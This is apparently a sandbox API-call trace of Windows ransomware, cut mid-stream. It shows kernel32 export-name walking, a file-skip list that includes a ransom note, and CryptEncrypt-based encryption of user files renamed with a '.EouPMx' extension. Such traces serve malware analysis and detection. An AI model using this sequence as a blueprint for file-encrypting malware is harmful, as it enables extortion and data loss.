22 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.392] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.393] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.393] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.393] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.393] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.393] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.393] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.393] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.393] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.393] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.393] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.393] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.393] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.393] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.393] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.393] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.393] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.393] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.393] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.394] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.394] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.394] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.394] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.394] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.394] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.394] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi") returned 62 [0087.394] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi.EouPMx") returned 69 [0087.394] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ind-.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\ind-.avi.EouPMx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ind-.avi.eoupmx"), dwFlags=0x0) returned 1 [0087.395] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.395] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.395] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.395] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a33fd0, ftCreationTime.dwHighDateTime=0x1d4d047, ftLastAccessTime.dwLowDateTime=0xc8a2a890, ftLastAccessTime.dwHighDateTime=0x1d4d28a, ftLastWriteTime.dwLowDateTime=0xc8a2a890, ftLastWriteTime.dwHighDateTime=0x1d4d28a, nFileSizeHigh=0x0, nFileSizeLow=0xa16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="IzbRoJNJtopbW6u9q.swf", cAlternateFileName="IZBROJ~1.SWF")) returned 1 [0087.395] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0087.395] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="autorun.inf") returned 1 [0087.395] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="boot.ini") returned 1 [0087.395] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="desktop.ini") returned 1 [0087.395] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="ntuser.dat") returned -1 [0087.396] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="iconcache.db") returned 1 [0087.396] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="bootsect.bak") returned 1 [0087.396] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="ntuser.dat.log") returned -1 [0087.396] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="thumbs.db") returned -1 [0087.396] lstrcmpiW (lpString1="IzbRoJNJtopbW6u9q.swf", lpString2="Bootfont.bin") returned 1 [0087.396] lstrlenW (lpString="IzbRoJNJtopbW6u9q.swf") returned 21 [0087.396] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.396] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.396] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.396] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.396] lstrlenW (lpString="IzbRoJNJtopbW6u9q.swf") returned 21 [0087.396] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.396] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="IzbRoJNJtopbW6u9q.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf" [0087.396] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\IzbRoJNJtopbW6u9q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\izbrojnjtopbw6u9q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.396] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=41322) returned 1 [0087.396] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.396] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.397] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.397] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.397] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.397] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.397] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.398] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.398] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.399] CloseHandle (hObject=0x42c) returned 1 [0087.399] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.399] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.400] CloseHandle (hObject=0x0) returned 0 [0087.400] CloseHandle (hObject=0x428) returned 1 [0087.400] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.400] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.400] GetTickCount () returned 0x114e4b4 [0087.400] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.401] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.401] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.401] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.401] lstrlenA (lpString="kernel32.dll") returned 12 [0087.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.401] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.401] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.401] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.401] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.401] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.401] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.401] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.401] lstrlenA (lpString="ADDATOMA") returned 8 [0087.401] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.401] lstrlenA (lpString="ADDATOMW") returned 8 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.402] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.402] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.402] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.402] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.402] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.402] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.402] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.402] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.402] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.402] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.402] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.402] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.402] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.402] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.402] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.402] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.402] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.402] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.403] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.403] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.403] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.403] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.403] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.403] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.403] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.403] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.403] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.403] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.406] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.406] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.406] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.406] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.406] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.406] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.406] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.406] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.407] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.407] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.407] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.407] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.407] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.407] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.407] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.407] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.407] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.407] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.407] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.407] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.407] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.407] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.407] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.407] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.407] lstrlenA (lpString="BEEP") returned 4 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.407] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.407] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.407] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.408] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.408] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.408] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") 